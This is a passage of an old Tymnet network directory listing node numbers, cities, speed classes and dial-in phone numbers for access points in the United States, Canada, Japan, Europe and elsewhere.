+04003 Brechin                  GBR  1     C C  C     (356) 25782  Y TYMUSA
+04003 Brecon                   GBR  1     C C  C     (874) 3151   Y TYMUSA
+04003 Brighton                 GBR  1     C C  C     (273) 550046 Y TYMUSA
+04003 Campbeltown              GBR  1     C C  C     (586) 52298  Y TYMUSA
+04003 Canterbury               GBR  1     C C  C     (227) 762950 Y TYMUSA
+04003 Carlisle                                       612/333-2799 N
+04325 Hempstead            NY  USA  MED   B B  C     516/485-7422 Y
+04325 Mineola/Hempstead    NY  USA  MED   B B  C     516/485-7422 Y
+04327 Salem                OR  USA  LOW   B B  C     503/370-4314 Y
+04330 Lubbock              TX  USA  LOW   B B  C     806/797-0765 Y
+04340 Brownsville          TX  USA  LOW   B B  C     512/548-1331 Y
+04343 Dallas               TX  USA  HIGH  B B  C     214/630-5516 Y
+04353 Beverly Hills/Shr Ok CA  USA  MED   B B  C     818/789-9557 Y
+04353 Canoga Park/Shrm Oak CA  USA  MED   B B  C     818/789-9557 Y
+04353 San Fernando/Shr Oak CA  USA  MED   B B  C     818/789-9557 Y
+04353 Sherman Oaks         CA  USA  MED   B B  C     818/789-9557 Y
+04353 Van Nuys/Sherman Oak CA  USA  MED   B B  C     818/789-9557 Y
+04353 West L.A./Shrmn Oaks CA  USA  MED   B B  C     818/789-9557 Y
+04355 Detroit              MI  USA  HIGH       C  C  313/965-4982 N TYM-X25
+04360 San Diego            CA  USA  HIGH  B B        619/296-3370 N
+04372 Norristown           PA  USA  WATS  B B  C     800/###-#### Y
+04375 Concord              NH  USA  LOW   B B  C     603/228-4732 Y
+04376 Merced               CA  USA  LOW   B B  C     209/383-7593 Y
+04403 Oklahoma City        OK  USA  HIGH  B B  C     405/495-9201 Y
+04411 Belmont/Redwood City CA  USA  HIGH  B B  C     415/361-8701 Y
+04411 Palo Alto/Redwd City CA  USA  HIGH  B B  C     415/361-8701 Y
+04411 Redwood City         CA  USA  HIGH  B B  C     415/361-8701 Y
+04430 Newark/Wilmington    DE  USA  MED   B B        302/652-2060 N
+04430 Wilmington           DE  USA  MED   B B        302/652-2060 N
+05177 Huntsville           AL  USA  MED   B B  C     205/882-1519 Y
+05201 Greenville           SC  USA  MED   B B  C     803/271-9213 Y
+05205 Eindhoven                NLD  E1    C C  C  C  (4902) 45530 Y
+05206 White Plains         NY  USA  HIGH  B B        914/328-7730 N
+05211 Eatontown/Red Bank   NJ  USA  LOW   B B  C     908/758-0337 Y
+05211 Long Branch/Red Bank NJ  USA  LOW   B B  C     908/758-0337 Y
+05211 Red Bank             NJ  USA  LOW   B B  C     908/758-0337 Y
+05215 Hibbing              MN  USA  LOW   B B  C     218/262-3824 Y
+05221 Florence             AL  USA  LOW   B B  C     205/760-0030 Y
+05241 Inglewood/Vernon     CA  USA  HIGH  B B        213/587-0030 N
+05241 Los Angeles/Vernon   CA  USA  HIGH  B B        213/587-0030 N
+05241 Vernon               CA  USA  HIGH  B B        213/587-0030 N
+05242 Inglewood/Vernon     CA  USA  HIGH  B B        213/587-0030 N
+05242 Los Angeles/Vernon   CA  USA  HIGH  B B        213/587-0030 N
+05242 Vernon               CA  USA  HIGH  B B        213/587-0030 N
+05250 Quincy               IL  USA  LOW   B B  C     217/223-9531 Y
+05253 Clarkesville         TN  USA  LOW   B B  C     615/645-8877 Y
+05256 Durham               NH  USA  LOW   B B  C     603/868-1502 Y
+05260 Spokane              WA  USA  MED   B B        509/624-1549 N
+05264 Rocky Mount          NC  USA  LOW   B B  C     919/937-4828 Y
+05277 Philadelphia         PA  USA  HIGH  B B  C     215/592-8750 Y
+05304 Fort Pierce          FL  USA  LOW   B B  C     407/466-5661 Y
+05307 Peoria               IL  USA  LOW   B B  C     309/637-5961 Y
+05325 Colton               CA  USA  MED   B B  C     714/422-0222 Y
+05325 Riverside/Colton     CA  USA  MED   B B  C     714/422-0222 Y
+05325 San Bernadino/Colton CA  USA  MED   B B  C     714/422-0222 Y
+05333 Bloomfield           CT  USA  HIGH          C  203/286-0712 N TYM-X25
+05333 Hartford/Bloomfield  CT  USA  HIGH          C  203/286-0712 N TYM-X25
+05341 Alameda/Oakland      CA  USA  HIGH  B B  C     510/633-1896 Y
+05341 Berkeley/Oakland     CA  USA  HIGH  B B  C     510/633-1896 Y
+05341 Hayward/Oakland      CA  USA  HIGH  B B  C     510/633-1896 Y
+05341 Oakland              CA  USA  HIGH  B B  C     510/633-1896 Y
+05350 Antioch              CA  USA  LOW   B B  C     510/754-8222 Y
+05363 Brussels                 BEL  E1               206/221-0450 N DCS GATEWAY
+05365 Wausau               WI  USA  LOW   B B  C     715/848-6171 Y
+05366 Pontiac              MI  USA  LOW   B B  C     313/338-8384 Y
+05402 Dallas               TX  USA  HIGH          C  214/634-0833 N TYM-X25
+05402 Dallas               TX  USA  HIGH       C     214/634-0834 N TYM-X25
+05402 Dallas               TX  USA  HIGH       C     214/634-0834 N TYM-X25
+05410 Minneapolis          MN  USA  HIGH          C  612/332-2580 N TYM-X25
+05410 St. Paul/Minneapolis MN  USA  HIGH          C  612/332-2580 N TYM-X25
+05410 Minneapolis          MN  USA  HIGH       C     612/332-2680 N TYM-X25
+05410 St. Paul/Minneapolis MN  USA  HIGH       C     612/332-2680 N TYM-X25
+05415 Wichita Falls        TX  USA  LOW   B B  C     817/723-2386 Y
+05417 Marseille                FRA  E1    C C  C     (91) 259933  Y
+05431 Opelika              AL  USA  LOW   B B  C     205/742-9040 Y
+06515 Charlotte            NC  USA  HIGH          C  704/329-0104 Y
+06522 Pawtucket/Providence RI  USA  HIGH  B B  C     401/273-0200 Y
+06522 Providence           RI  USA  HIGH  B B  C     401/273-0200 Y
+06522 Warwick/Providence   RI  USA  HIGH  B B  C     401/273-0200 Y
+06525 New Orleans          LA  USA  HIGH  B B  C     504/525-2014 Y
+06532 New Orleans          LA  USA  HIGH  B B        504/522-1370 N
+06544 Piscataway           NJ  USA  HIGH  B B  C     908/562-8550 Y
+06560 Rostock                  FRG  E1    C C  C     (81)36622404 Y
+06562 Dublin                   IRL  E2    C C  C     (1)67 98 924 Y
+06564 Everett              WA  USA  LOW   B B  C     206/258-1018 Y
+06567 Vicksburg            MS  USA  LOW   B B  C     601/638-1551 Y
+06570 Pittsburgh           PA  USA  HIGH          C  412/642-2271 N
+06574 Miami                FL  USA  HIGH  B B  C     305/599-2900 Y
+06577 Boston               MA  USA  HIGH  B B  C     617/439-3531 Y
+06577 Cambridge/Boston     MA  USA  HIGH  B B  C     617/439-3531 Y
+06605 San Jose             CA  USA  HIGH  B B  C     408/432-8618 Y
+06605 Santa Clara/San Jose CA  USA  HIGH  B B  C     408/432-8618 Y
+06605 Sunnyvale/San Jose   CA  USA  HIGH  B B  C     408/432-8618 Y
+06614 Akron                OH  USA  MED   B B  C     216/376-8330 Y
+06626 Lexington            KY  USA  MED   B B        606/266-0019 N
+06641 Kingston             MA  USA  LOW   B B  C     617/582-1200 Y
+06651 Aurora/Denver        CO  USA  HIGH          C  303/830-8530 Y
+06651 Boulder/Denver       CO  USA  HIGH          C  303/830-8530 Y
+06651 Denver               CO  USA  HIGH          C  303/830-8530 Y
+06667 Reading/Mt. Penn     PA  USA  MED   B B  C     215/796-9000 Y
+06667 Mt. Penn             PA  USA  LOW   B B  C     215/796-9000 Y
+06670 Barcelona                ESP  E2    C C  C     (3) 4155082  Y
+06673 Aberdeen             MD  USA  LOW   B B  C     410/273-0872 Y
+06674 Houston              TX  USA  HIGH  B B        713/556-6700 N
+06675 State College        PA  USA  LOW   B B  C     814/234-3853 Y
+06704 Houston              TX  USA  HIGH  B B        713/556-6700 N
+06715 Midlothian/Richmond  VA  USA  MED   B B        804/330-2465 N
+06715 Richmond             VA  USA  MED   B B        804/330-2465 N
+06733 Los Angeles/Vernon   CA  USA  HIGH          C  213/588-4712 N TYM-X25
+06733 Inglewood/Vernon     CA  USA  HIGH          C  213/588-4712 N TYM-X25
+06733 Vernon               CA  USA  HIGH          C  213/588-4712 N TYM-X25
+06733 Los Angeles/Vernon   CA  USA  HIGH       C     213/588-4639 N TYM-X25
+06733 Inglewood/Vernon     CA  USA  HIGH       C     213/588-4639 N TYM-X25
+06733 Vernon               CA  USA  HIGH       C     213/588-4639 N TYM-X25
+06754 Kitchener            ON  CAN  CANL  C C  C     519/742-7613 Y
+06755 Coatesville          PA  USA  LOW   B B  C     215/383-0440 Y
+06755 Downington/Coatsvlle PA  USA  LOW   B B  C     215/383-0440 Y
+06762 Marquette            MI  USA  LOW   B B  C     906/228-3780 Y
+06771 Ft. Smith            AR  USA  LOW   B B  C     501/782-2486 Y
+06774 Topeka               KS  USA  LOW   B B  C     913/234-3070 Y
+07001 Boston               MA  USA  HIGH  B B        617/439-3400 N
+07001 Cambridge/Boston     MA  USA  HIGH  B B        617/439-3400 N
+07005 Detroit              MI  USA  HIGH          C  313/964-1225 Y
+07024 Longview             TX  USA  LOW   B B  C     903/236-7475 Y
+07025 Madison              WI  USA  LOW   B B  C     608/242-0227 Y
+07026 Madison              WI  USA  LOW   B B  C     608/242-0227 Y
+07031 Albany               GA  USA  LOW   B B  C     912/888-9282 Y
+07042 Nashua               NH  USA  MED   B B  C     603/882-0435 Y
+07042 Salem/Nashua         NH  USA  MED   B B  C     603/882-0435 Y
+07043 Sarasota             FL  USA  LOW   B B  C     813/952-9000 Y
+07057 New York             NY  USA  HIGH          C  212/797-2792 N TYM-X25
+07057 New York             NY  USA  HIGH       C     212/797-2790 N TYM-X25
+07075 Cincinnati           OH  USA  HIGH  B B        513/530-9019 N
+07100 Los Altos/San Jose   CA  USA  HIGH  B B  C     408/432-8618 Y
+07100 San Jose             CA  USA  HIGH  B B  C     408/432-8618 Y
+07100 Santa Clara/San Jose CA  USA  HIGH  B B  C     408/432-8618 Y
+07100 Sunnyvale/San Jose   CA  USA  HIGH  B B  C     408/432-8618 Y
+07102 Hutchinson           KS  USA  LOW   B B  C     316/663-2192 Y
+07107 Barre/Montpelier     VT  USA  LOW   B B        802/229-4508 N
+07107 Montpelier           VT  USA  LOW   B B        802/229-4508 N
+7117  Fremont              CA  USA  MED   B B  C     510/490-7366 Y
+07126 Rolla                MO  USA  LOW   B B  C     314/364-2084 Y
+07140 Cincinnati           OH  USA  HIGH          C  513/489-1032 Y
+07143 Portland             OR  USA  HIGH          C  503/225-1918 Y
+07144 Portland             OR  USA  HIGH  B B  C     503/222/2151 Y
+07145 Portland             OR  USA  HIGH          C  503/225-1918 Y
+07145 Portland             OR  USA  HIGH  B B  C     503/222-2151 Y
+07147 Portland             OR  USA  HIGH  B B        503/222-0900 N
+07150 Boca Raton/Delray    FL  USA  LOW   B B  C     407/272-7900 Y
+07150 Delray               FL  USA  LOW   B B  C     407/272-7900 Y
+07157 Rosewell             NM  USA  LOW   B B  C     505/623-3591 Y
+07162 Perinton/Pittsford   NY  USA  HIGH          C  716/586-4100 Y
+07162 Perinton/Pittsford   NY  USA  HIGH          C  716/586-4858 N TYM-X25
+07162 Rochester/Pittsford  NY  USA  HIGH          C  716/586-4100 Y
+07162 Pittsford            NY  USA  HIGH          C  716/586-4100 Y
+07162 Pittsford            NY  USA  HIGH          C  716/586-4858 N TYM-X25
+07162 Rochester/Pittsford  NY  USA  HIGH          C  716/586-4858 N TYM-X25
+07162 Perinton/Pittsford   NY  USA  HIGH       C     716/586-4829 N TYM-X25
+07162 Pittsford            NY  USA  HIGH       C     716/586-4829 N TYM-X25
+07162 Rochester/Pittsford  NY  USA  HIGH       C     716/586-4829 N TYM-X25
+07175 Myrtle Beach         SC  USA  LOW   B B  C     803/448-1619 Y
+07177 Copenhagen               DNK  E2    C C  C     31-18-63-33  Y
+07205 Los Altos/San Jose   CA  USA  HIGH  B B        408/432-3430 N
+07205 San Jose             CA  USA  HIGH  B B        408/432-3430 N
+07205 Santa Clara/San Jose CA  USA  HIGH  B B        408/432-3430 N
+07205 Sunnyvale/San Jose   CA  USA  HIGH  B B        408/432-3430 N
+07210 Fall River/Somerset  MA  USA  LOW   B B  C     508/676-3087 Y
+07210 Somerset             MA  USA  LOW   B B  C     508/676-3087 Y
+07214 Middletown           RI  USA  LOW   B B  C     401/849-1660 Y
+07214 Newport/Middletown   RI  USA  LOW   B B  C     401/849-1660 Y
+07220 Bridgeport           CT  USA  MED   B B        203/579-1479 N
+07220 Stratford/Bridgeprt  CT  USA  MED   B B        203/579-1479 N
+07221 Atlantic City        NJ  USA  LOW   B B  C     609/345-4050 Y
+07223 Dayton               OH  USA  MED   B B  C     513/898-0696 Y
+07226 Ogden                UT  USA  LOW   B B  C     801/393-5280 Y
+07227 Mexico C(Xochimilco)     MEX  MX    B B  B     (5)6754911   N
+07227 Mexico C(Xochimilco)     MEX  MX    B B  B     (5)6754072   N
+07227 Mexico C(Xochimilco)     MEX  MX    B B  B     (5)6754635   N
+07227 Mexico C(Xochimilco)     MEX  MX    B B  B     (5)6753173   N
+07227 Mexico C(Xochimilco)     MEX  MX    B B  B     (5)6753372   N
+07227 Mexico C(Xochimilco)     MEX  MX    B B  B     (5)6753629   N
+07236 White Plains         NY  USA  HIGH  B B  C     914/761-9590 Y
+07240 White Plains         NY  USA  HIGH          C  914/761-5377 Y
+07241 Greenville           NC  USA  LOW   B B  C     919/758-0102 Y
+07242 High Point           NC  USA  LOW   B B  C     919/883-6121 Y
+07246 San Francisco        CA  USA  HIGH          C  415/896-5578 N TYM-X25
+07247 San Antonio          TX  USA  HIGH  B B  C     512/222-9877 Y
+07250 Curacao                  NDA  3     C C        (9)239251    N TYMUSA
+07250 Curacao                  NDA  3     C C        0251 (LOCAL)   TYMUSA
+07270 Gibraltar                GIB  E2    C C  C     (350) 41000  Y
+07272 Greenville           SC  USA  MED           C  803/370-9014 Y
+07301 Rome                 GA  USA  LOW   B B  C     404/234-0102 Y
+07302 San Francisco        CA  USA  HIGH  B B  C     415/543-0691 Y
+07303 Danville             IL  USA  LOW   B B  C     217/442-1452 Y
+07306 Davenport/RockIsland IA  USA  MED   B B  C     309/788-3713 Y
+07306 Rock Island          IL  USA  MED   B B  C     309/788-3713 Y
+07313 Melbourne                AUS  PAC   C C  C     (3)416-2146  Y
+07320 San Francisco        CA  USA  HIGH  B B  C     415/543-0691 Y
+07322 Greeley              CO  USA  LOW   B B  C     303/352-0960 Y
+07331 Levittown            PA  USA  LOW   B B        215/943-3700 N
+07332 Pittsfield           MA  USA  LOW   B B  C     413/499-0971 Y
+07336 Ardmore              OK  USA  LOW   B B  C     405/226-1260 Y
+07340 Grand Forks          ND  USA  LOW   B B  C     701/746-0344 Y
+07344 Lynn                 MA  USA  LOW   B B  C     617/592-0207 Y
+07346 San Francisco        CA  USA  HIGH  B B  C     415/543-0691 Y
+07364 Corning              NY  USA  LOW   B B  C     607/962-4481 Y
+07370 Spartanburg          SC  USA  LOW   B B  C     803/579-7088 Y
+07375 Hanover              NH  USA  LOW   B B  C     603/643-4011 Y
+07404 Long Beach           CA  USA  MED   B B  C     310/436-6033 Y
+07404 Norwalk/Long Beach   CA  USA  MED   B B  C     310/436-6033 Y
+07404 San Pedro/Long Beach CA  USA  MED   B B  C     310/436-6033 Y
+07406 Akita                    JPN  PAC     C  C     0188-65-5733 N
+07406 Akita                    JPN  PAC   C          0188-65-5735 N
+07406 Atsugi                   JPN  PAC     C  C     0462-21-0404 N
+07406 Atsugi                   JPN  PAC   C          0462-21-5331 N
+07406 Atsugi                   JPN  PAC   C C  C     0462-22-7154 Y
+07406 Chiba                    JPN  PAC     C  C     0472-96-3581 N
+07406 Chiba                    JPN  PAC   C C  C     0472-96-0279 Y
+07406 Fukui                    JPN  PAC     C  C     0776-35-8840 N
+07406 Fukui                    JPN  PAC   C          0776-34-3308 N
+07406 Fukuoka                  JPN  PAC     C  C     092-474-7196 N
+07406 Fukuoka                  JPN  PAC   C          092-474-7076 N
+07406 Fukuoka                  JPN  PAC   C C  C     092-461-2769 Y
+07406 Hamamatsu                JPN  PAC   C          0534-56-7355 N
+07406 Hamamatsu                JPN  PAC     C  C     0534-56-7231 N
+07406 Hiroshima                JPN  PAC     C  C     082-243-9270 N
+07406 Hiroshima                JPN  PAC   C C  C     082-241-6857 Y
+07406 Kagoshima                JPN  PAC     C  C     0992-22-8954 N
+07406 Kanazawa                 JPN  PAC     C  C     0762-24-2341 N
+07406 Kanazawa                 JPN  PAC   C C  C     0762-24-7792 Y
+07406 Kobe                     JPN  PAC     C  C     078-333-0552 N
+07406 Kobe                     JPN  PAC   C          078-333-0587 N
+07406 Kouriyama                JPN  PAC     C  C     0249-38-5396 N
+07406 Kumamoto                 JPN  PAC     C  C     096-354-3065 N
+07406 Kumamoto                 JPN  PAC   C          096-355-5233 N
+07406 Kyoto                    JPN  PAC     C  C     075-431-6203 N
+07406 Kyoto                    JPN  PAC   C          075-431-6205 N
+07406 Matsuyama                JPN  PAC     C  C     0899-32-4207 N
+07406 Matsuyama                JPN  PAC   C          0899-32-2975 N
+07406 Matsuyama                JPN  PAC   C C  C     0899-32-2865 Y
+07406 Mito                     JPN  PAC     C  C     0292-24-4213 N
+07406 Morioka                  JPN  PAC     C  C     0196-54-7315 N
+07406 Morioka                  JPN  PAC   C C  C     0196-22-3885 Y
+07406 Nagasaki                 JPN  PAC     C  C     0958-28-6077 N
+07406 Nagoya                   JPN  PAC     C  C     052-981-3221 N
+07406 Nagoya                   JPN  PAC   C          052-911-1621 N
+07406 Nagoya                   JPN  PAC   C C  C     052-991-4521 Y
+07406 Naha                     JPN  PAC     C  C     0988-61-3414 N
+07406 Naha                     JPN  PAC   C          0988-61-4002 N
+07406 Niigata                  JPN  PAC     C  C     025-241-5410 N
+07406 Niigata                  JPN  PAC   C C  C     025-241-5409 Y
+07406 Ohita                    JPN  PAC     C  C     0975-38-2160 N
+07406 Okayama                  JPN  PAC     C  C     0862-31-4993 N
+07406 Okayama                  JPN  PAC   C          0862-32-6760 N
+07406 Osaka                    JPN  PAC     C        06-271-9029  N
+07406 Osaka                    JPN  PAC     C  C     06-271-6876  N
+07406 Osaka                    JPN  PAC   C          06-271-9028  N
+07406 Osaka                    JPN  PAC   C C  C     06-264-9951  Y
+07406 Sapporo                  JPN  PAC     C  C     011-281-4421 N
+07406 Sapporo                  JPN  PAC   C          011-281-4343 N
+07406 Sapporo                  JPN  PAC   C C  C     011-210-5962 Y
+07406 Sendai                   JPN  PAC     C  C     022-231-5355 N
+07406 Sendai                   JPN  PAC   C C  C     022-231-5741 Y
+07406 Shizuoka                 JPN  PAC     C  C     0542-84-3398 N
+07406 Shizuoka                 JPN  PAC   C C  C     0542-84-3393 Y
+07406 Takamatsu                JPN  PAC     C  C     0878-23-0501 N
+07406 Takamatsu                JPN  PAC   C          0878-23-0502 N
+07406 Takasaki                 JPN  PAC     C  C     0273-23-9739 N
+07406 Tokuyama                 JPN  PAC     C  C     0834-32-0991 N
+07406 Tokyo                    JPN  PAC     C        03-3555-9526 N
+07406 Tokyo                    JPN  PAC     C  C     03-3555-9696 N N
+07406 Tokyo                    JPN  PAC   C          03-3555-9525 N
+07406 Tokyo                    JPN  PAC   C C  C     03-3288-6461 Y
+07406 Toyama                   JPN  PAC     C  C     0764-41-7769 N
+07406 Toyama                   JPN  PAC   C          0764-41-7578 N
+07406 Tsuchiura                JPN  PAC     C  C     0298-55-6121 N
+07406 Urawa                    JPN  PAC     C  C     048-833-9341 N
+07406 Utsunomiya               JPN  PAC     C  C     0286-34-8251 N
+07406 Utsunomiya               JPN  PAC   C C  C     0286-37-4378 Y
+07406 Yokohama                 JPN  PAC     C  C     045-453-7637 N
+07406 Yokohama                 JPN  PAC   C          045-453-7757 N
+07406 Yokohama                 JPN  PAC   C C  C     045-453-7758 Y
+07406 Yonago                   JPN  PAC     C  C     0859-32-3201 N
+07406 Nagasaki                 JPN  PAC   C          0958-28-6088 N
+07406 Nagano                   JPN  PAC     C  C     0262-34-3900 N
+07406 Tokyo                    JAP  PAC        C  C  03-3262-7517 N TYM-X25
+07406 Tokyo                    JAP  PAC           C  03-5275-3829 Y NEW NUMBER
+07407 Buenos Aires             ARG  2     C          (1) 40-01-91 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-92 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-93 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-94 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-95 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-96 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-97 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-98 N TYMUSA
+07407 Buenos Aires             ARG  2     C          (1) 40-01-99 N TYMUSA
+07414 Warren               OH  USA  LOW   B B  C     216/392-2555 Y
+07417 San Francisco        CA  USA  HIGH          C  415/495-7220 Y
+07432 Lyndhurst/Union City NJ  USA  HIGH  B B  C     201/864-8468 Y
+07432 Union City           NJ  USA  HIGH  B B  C     201/864-8468 Y
+07434 Davis                CA  USA  LOW   B B  C     916/758-3551 Y
+07434 Woodland/Davis       CA  USA  LOW   B B  C     916/758-3551 Y
+07437 Austin               TX  USA  HIGH  B B  C     512/448-1096 Y
+07447 Butte                MT  USA  LOW   B B  C     406/494-6682 Y
+07450 Dallas               TX  USA  HIGH          C  214/637-3012 Y
+07454 Terre Haute          IN  USA  LOW   B B  C     812/232-0112 Y
+07455 Lafayette            IN  USA  LOW   B B  C     317/423-4616 Y
+07456 Dubuque              IA  USA  LOW   B B  C     319/582-3599 Y
+07457 Minot                ND  USA  LOW   B B  C     701/838-2140 Y
+07460 Beloit               WI  USA  LOW   B B  C     608/362-4655 Y
+07460 Janesville/Beloit    WI  USA  LOW   B B  C     608/362-4655 Y
+07463 Hot Springs          AR  USA  LOW   B B  C     501/623-3576 Y
+07464 Jonesboro            AR  USA  LOW   B B  C     501/935-7957 Y
+07465 Cadillac             MI  USA  LOW   B B  C     616/775-9242 Y
+07466 Muskegon             MI  USA  LOW   B B  C     616/739-3453 Y
+07467 Port Huron           MI  USA  LOW   B B  C     313/982-0301 Y
+07472 Mansfield            OH  USA  LOW   B B  C     419/529-3303 Y
+07520 Atlanta/Doraville    GA  USA  HIGH  B B  C     404/451-3362 Y
+07520 Doraville            GA  USA  HIGH  B B  C     404/451-3362 Y
+07520 Marietta/Doraville   GA  USA  HIGH  B B  C     404/451-3362 Y
+07520 Norcross/Doraville   GA  USA  HIGH  B B  C     404/451-3362 Y
+07522 San Angelo           TX  USA  LOW   B B  C     915/658-4590 Y
+07524 San Antonio          TX  USA  HIGH  B B  C     512/222-9877 Y
+07525 Boston               MA  USA  HIGH  B B        617/439-3400 N
+07525 Cambridge/Boston     MA  USA  HIGH  B B        617/439-3400 N
+07533 Inglewood/Vernon     CA  USA  HIGH          C  213/588-8128 Y
+07533 Los Angeles/Vernon   CA  USA  HIGH          C  213/588-8128 Y
+07533 Vernon               CA  USA  HIGH          C  213/588-8128 Y
+07540 Calgary              AB  CAN  CANH  C C  C     403/232-6653 Y
+07542 Sacramento           CA  USA  HIGH          C  916/442-0992 N
+07543 Sacramento           CA  USA  HIGH          C  916/442-0851 N TYM-X25
+07547 Taunton              MA  USA  LOW   B B  C     508/824-3816 Y
+07571 Salisbury            MD  USA  LOW   B B  C     410/860-0480 Y
+07600 Bowling Green        KY  USA  LOW   B B  C     502/781-5711 Y
+07602 All Cities               ATG  3     B B        809/462-0210 N TYMUSA
+07603 All Cities               ATG  3     B B        809/462-0210 N TYMUSA
+07607 Gastonia             NC  USA  LOW   B B  C     704/867-2203 Y
+07617 Corpus Christi       TX  USA  MED   B B  C     512/289-7305 Y
+07622 Manassas             VA  USA  LOW   B B  C     703/330-9070 Y
+07625 Lowell               MA  USA  LOW   B B  C     508/452-5112 Y
+07631 Auburn               WA  USA  LOW   B B  C     206/735-3975 Y
+07631 Enumclaw/Auburn      WA  USA  LOW   B B  C     206/735-3975 Y
+07636 Santa Fe             NM  USA  LOW   B B  C     505/471-0606 Y
+07646 Monroe               LA  USA  LOW   B B  C     318/388-8810 Y
+07650 Kokomo               IN  USA  LOW   B B  C     317/453-7818 Y
+07651 Appleton             WI  USA  LOW   B B  C     414/730-8029 Y
+07652 Corona               CA  USA  LOW   B B  C     714/737-5510 Y
+07653 Poway                CA  USA  LOW   B B  C     619/679-0200 Y
+07655 Norristown           PA  USA  WATS  B B  C     800/###-#### Y
+07656 Norristown           PA  USA  WATS  B B  C     800/###-#### Y
+07663 Birmingham               GBR  E1    C C  C     (21)632-6636 Y
+07675 Dundas               ON  CAN  CANH  C C  C     416/628-5908 Y
+07676 Newport News         VA  USA  MED   B B  C     804/596-0898 Y
+07677 Fitchburg/Leominster MA  USA  LOW   B B  C     508/537-6451 Y
+07677 Leominster           MA  USA  LOW   B B  C     508/537-6451 Y
+07703 Inglewood/Vernon     CA  USA  HIGH  B B  C     213/587-7514 Y
+07703 Los Angeles/Vernon   CA  USA  HIGH  B B  C     213/587-7514 Y
+07703 Vernon               CA  USA  HIGH  B B  C     213/587-7514 Y
+07712 Vero Beach           FL  USA  LOW   B B  C     407/569-8207 Y
+07714 Meridian             MS  USA  LOW   B B  C     601/482-4335 Y
+07717 Baytown              TX  USA  LOW   B B  C     713/420-3389 Y
+07720 Miami                FL  USA  HIGH          C  305/599-9996 N TYM-X25
+07720 Miami                FL  USA  HIGH       C     305/599-9997 N TYM-X25
+07721 Freeport             IL  USA  LOW   B B  C     815/232-7111 Y
+07723 Dothan               AL  USA  LOW   B B  C     205/794-7954 Y
+07724 Miami                FL  USA  HIGH          C  305/592-2357 Y
+07725 Panama City          FL  USA  LOW   B B  C     904/769-0709 Y
+07726 Leavenworth          KS  USA  LOW   B B  C     913/651-8094 Y
+07730 Salina               KS  USA  LOW   B B  C     913/825-4845 Y
+07731 Cicero/Maywood       IL  USA  LOW   B B  C     708/345-9100 Y
+07731 Forest Park/Maywood  IL  USA  LOW   B B  C     708/345-9100 Y
+07731 Maywood              IL  USA  LOW   B B  C     708/345-9100 Y
+07733 Marion               IN  USA  LOW   B B  C     317/662-1928 Y
+07735 Attleboro            MA  USA  LOW   B B        508/226-6441 N
+07737 Lynchburg            VA  USA  LOW   B B  C     804/846-0213 Y
+07743 Holyoke/Springfield  MA  USA  MED   B B  C     413/787-0048 Y
+07743 Springfield          MA  USA  MED   B B  C     413/787-0048 Y
+10021 Houston              TX  USA  HIGH  B B  C     713/496-1332 Y
+10021 Houston              TX  USA  HIGH          C  713/589-7593 N TYM-X25
+10021 Houston              TX  USA  HIGH       C     713/589-7591 N TYM-X25
+10027 Kannapolis           NC  USA  LOW   B B  C     704/932-4131 Y
+10031 Bedford              MA  USA  LOW   B B  C     617/271-0420 Y
+10031 Woburn/Bedford       MA  USA  LOW   B B  C     617/271-0420 Y
+10033 Bend                 OR  USA  LOW   B B  C     503/389-0146 Y
+10034 Baltimore            MD  USA  HIGH          C  410/659-7460 Y
+10040 Columbus             OH  USA  HIGH          C  614/224-0436 N TYM-X25
+10040 Columbus             OH  USA  HIGH       C     614/224-0427 N TYM-X25
+10052 Napa                 CA  USA  LOW   B B  C     707/257-6810 Y
+10061 Buffalo              NY  USA  MED   B B        716/893-1306 N
+10066 Williamsport         PA  USA  LOW   B B  C     717/321-8520 Y
+10070 New York             NY  USA  HIGH          C  212/269-4640 Y
+10071 York                 PA  USA  LOW   B B  C     717/852-8186 Y
+10075 Blountville          TN  USA  LOW   B B  C     615/323-1962 Y
+10100 Corvallis            OR  USA  LOW   B B  C     503/757-6341 Y
+10103 Ann Arbor            MI  USA  MED           C  313/973-0166 Y
+10105 Camden/Pennsauken    NJ  USA  MED   B B  C     609/665-5902 Y
+10105 Cherry hill/Pennskn  NJ  USA  MED   B B  C     609/665-5902 Y
+10105 Pennsauken           NJ  USA  MED   B B  C     609/665-5902 Y
+10110 Newark               NJ  USA  HIGH          C  201/824-4130 N TYM-X25
+10110 Elizabeth/Newark     NJ  USA  HIGH          C  201/824-4130 N TYM-X25
+10110 Jersey City/Newark   NJ  USA  HIGH          C  201/824-4130 N TYM-X25
+10110 Union/Newark         NJ  USA  HIGH          C  201/824-4130 N TYM-X25
+10110 Elizabeth/Newark     NJ  USA  HIGH       C     201/824-4128 N TYM-X25
+10110 Jersey City/Newark   NJ  USA  HIGH       C     201/824-4128 N TYM-X25
+10110 Newark               NJ  USA  HIGH       C     201/824-4128 N TYM-X25
+10110 Union/Newark         NJ  USA  HIGH       C     201/824-4128 N TYM-X25
+10113 Fairfield/Westport   CT  USA  MED   B B  C     203/454-2129 Y
+10113 Norwalk/Westport     CT  USA  MED   B B  C     203/454-2129 Y
+10113 Westport             CT  USA  MED   B B  C     203/454-2129 Y
+10122 Hull/Ottawa          ON  CAN  CANH  C C  C     613/563-2910 N
+10122 Ottawa               ON  CAN  CANH  C C  C     613/563-2910 N
+10124 Cologne                  FRG  E1    C C  C     (221)210196  N
+10130 Sacramento           CA  USA  HIGH  B B  C     916/447-7434 Y
+10151 Portland             OR  USA  HIGH          C  503/225-1233 N TYM-X25
+10153 South Brunswick      NJ  USA  HIGH          C  609/452-8011 N TYM-X25
+10153 South Brunswick      NJ  USA  HIGH          C  609/452-8388 Y
+10153 Princeton/So. Brnswk NJ  USA  HIGH          C  609/452-8011 N TYM-X25
+10153 Princeton/So. Brnswk NJ  USA  HIGH          C  609/452-8388 Y
+10170 Johnstown            PA  USA  LOW   B B  C     814/539-5059 Y
+10171 Jamestown            NY  USA  LOW   B B        716/488-0794 N
+10172 Somers               CT  USA  LOW   B B  C     203/763-3521 Y
+10204 Austin               TX  USA  HIGH  B B  C     512/448-1096 Y
+10211 Atlanta/Doraville    GA  USA  HIGH          C  404/455-9285 N TYM-X25
+10211 Marietta/Doraville   GA  USA  HIGH          C  404/455-9285 N TYM-X25
